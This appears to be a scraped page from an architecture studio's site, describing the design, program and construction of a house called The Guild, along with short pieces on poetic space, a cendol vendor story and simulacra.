A building is not like an article that is easy to read and has implied meaning,聽聽but more like poetry that requires a deep understanding beyond what appears on the surface.聽An architects has elements of space, form and scale that can be described as a poetic space through inclusivity attitude.聽A poetic space can be measuring the value of intimacy which determines what kind of relationship between space and human. the dimension of intimacy can be a space-forming element that ultimately determines the level of poetic a space.聽The dimension of intimacy which makes a space has a different identity from another space.聽A story is one of the ways to get the value of intimacy, and also has a role in describing the space created. these stories that will give meaning to the space.聽The intimacy that can be perceived by human to space to determine whether the space will be something meaningful or empty.

Programming

The guild is a house for living, working and sharing. The guild鈥檚 program combined RAW’s studio, OMAH library and residence. The Design in this house was exercised in program, construction making, and process of living in full iteration from concept to construction. The program is flexible and demanding, providing flexibility and limitations of activities. In this house, the living, working, and sharing is exercised in programming and the detail. The programming is to be flexible but provide limitations. The program has been changing from time to time, from 3 bedrooms to 1 bedroom, from simple shape to more complex geometry, from perfection to imperfection. The guild consists of 2 storey, 1 mezzanine, and 1 summer pavilion on its roof top sitting along with linear garden and one inner courtyard. The office consists of mezzanine and formed by catenary curved, parabolic curve and circle forming the door, the office plan, and window. The structure material used is steel, in a grid 2x 6 m stair as its vertical circulation. It is located at the centre with the main and biggest tappered void made by concrete with slight opening on the top.

1% Cendol by Alhamdamar Mudafiq

Kalau warnanya hijau, pasti saya suka , ujar bapak tua penjual cendol sambil meninggalkan gerobak pikul cendolnya, lalu duduk di sebelah saya

Work in Progress

The process consists of several types of construction material to achieve efficiency, and durability by local craftsmanship. The first one is engineered wood construction using thinnest plywood in the area which is untouched by rain water which is engineered by 2 cm thickness plywood to easily bent in the curve and divided on module of 600 cm glass except the tempered glass which is used for full height glass from floor to ceiling. The other intention is to use recycle material such as iron wood and teakwood cut it into smaller pieces and treat it as floor finishes. All of the catenary door is an enginereed door which is exercised based on the efficiency of ergonomy, height of the people, ease to open the door, adjusted for the owner鈥檚 dimension, the minimum size of opening, the limitation of hinge and combination of steel.

The second process one is steel construction in creating rooftop stairs, office stairs, railing, window which use smallest size at it can to make it easy to build and construct with not more than 2 persons in one group using 40 x 40 mm steel in L shape and hollow shape joined with bolt to be able to dismantle and constructed in the construction process.

The third one is concrete construction which is art to casting the concrete which will open the skylight in top and the side part with tappered detail allowing natural light to the space inside.

Bumped

I just bumped attitudes of achieving similarity lacking originality.

A simulacrum (plural: simulacra from Latin: simulacrum, which means “likeness, similarity”), is a representation or imitation of a person or thing.[1] The word was first recorded in the English language in the late 16th century, used to describe a representation, such as a statue or a painting, especially of a god. By the late 19th century, it had gathered a secondary association of inferiority: an image without the substance or qualities of the original.[2] Philosopher Fredric Jameson offers photorealism as an example of artistic simulacrum, where a painting is sometimes created by copying a photograph that is itself a copy of the real.[3] Other art forms that play with simulacra include trompe-l’艙il,[4] pop art, Italian neorealism, and French New Wave.[3]

Are we in the middle of Simulacra Culture ?
